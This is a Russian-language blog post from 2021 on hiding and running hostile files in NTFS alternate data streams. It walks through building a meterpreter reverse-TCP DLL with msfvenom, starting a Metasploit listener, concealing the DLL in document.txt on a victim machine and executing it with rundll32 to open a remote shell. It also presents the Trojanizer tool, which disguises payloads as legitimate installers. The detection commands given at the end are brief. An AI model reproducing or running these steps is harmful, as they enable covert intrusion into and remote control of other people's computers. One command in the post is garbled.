А АTuesday 11 May 2021

Варианты имплементации file streaming.

Всем привет.

Как известно, хакеры могут скрывать свои инструментальные средства (файлы) на томах NTFS через механизм, известный как "потоковая" передача файлов (file streaming).  Когда инструментальные средства скрытые таким образом, то файлы в которых они спрятаны, не изменяются в размерах. 

Выполним имплементацию файла putty.exe в файл document.txt: 

type putty.exe > document.txt:test.exe

Однако спрятать просто файл это пол дела, хорошо бы еще ему сделать запуск на комьютере жертвы. Например так - запуск putty.exe из файла document.txt с помощью WMI: 

wmic process call create document.txt:test.exe

Но putty.exe есть putty.exe, вполне себе безобидная утилита.

А давайте рассмотрим вариант как же создать троян svchost.dll и имплементировать его в document.txt в Kali Linux. 

Выполняем в Kali Linux (192.168.1.10):

- создаем троян

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 lport=5000 -f dll -o /var/www/html/svchost.dll

- запускаем слушатель 

msf exploit(multi/handler) > resource /root/Desktop/meta_script/listener.rc

resource>use exploit/multi/handler

resource>set payload windows/meterpreter/reverse_tcp

resource>set lhost 192.168.1.10

resource>set lport 5000

resource>run

...

Выполняем на жертве имплементацию:

typeс > document.txt:svchost.dll

Выполняем запуск svchost.dll из файла document.txt с помощью Rundll32: 

rundll32.exe document.txt:svchost.dll,DllMain

...

- и мы в системе (Kali Linux):

meterpreter> теперь можем танцевать по жертве.

Еще один вариант. 

В состав Windows (начиная с Windows XP) входит интересная утилита – IExpress. Располагается она в c:\windows\system32, и поэтому ее можно вызывать без указания полного пути. У нее два основных назначения – создание относительно простых инсталляторов и самораспаковывающихся архивов (файлы с расширением exe). Конечно, в архивации она не сравнится в удобстве использования с коммерческими продуктами типа WinRar (об этом ниже), однако вполне может выручить, когда коммерческий архиватор не доступен (например, на сервере). Так же что не маловажно, утилита поддерживает работу из командной строки, что делает ее пригодной для использования в автоматизации (например, ее можно использовать как один из шагов в bat-файлах, при сборке проекта в Visual Studio и на билд-сервере). Вы не поверите, но IExpress доступна даже на Windows 10! 


И последний, на сегодня, вариант это имплементация вредного файла с помощью скрипта Trojanizer. По сути Trojanizer использует богатые возможности архиватора WinRAR при создании самораспаковывающихся архивов типа SFX. Далее языком оригинала, чтобы не транслировать идею.

The Trojanizer tool uses WinRAR (SFX) to compress the two files input by user, and transforms it into an SFX executable(.exe) archive. The sfx archive when executed it will run both files (our payload and the legit appl at the same time). To make the archive less suspicious to target at execution time, trojanizer will try to replace the default icon(.ico) of the sfx file with a user-selected one, and supress all SFX archive sandbox msgs (Silent=1 | Overwrite=1).

Trojanizer will not build trojans, but from target perspective, it replicates the trojan behavior: execute the payload in background, while the legit application executes in foreground.

Вот такие дела. Для быстрого выявления потоковых файлов можно использовать следующие утилиты:

lads c:\ / s

sfind c:\

Либо ту же команду dir с ключиком /r которая теперь покажет реальный размер файла:

dir /r

Успехов.

No comments:

Post a Comment

А что вы думаете по этому поводу?

Версия на печать

Популярное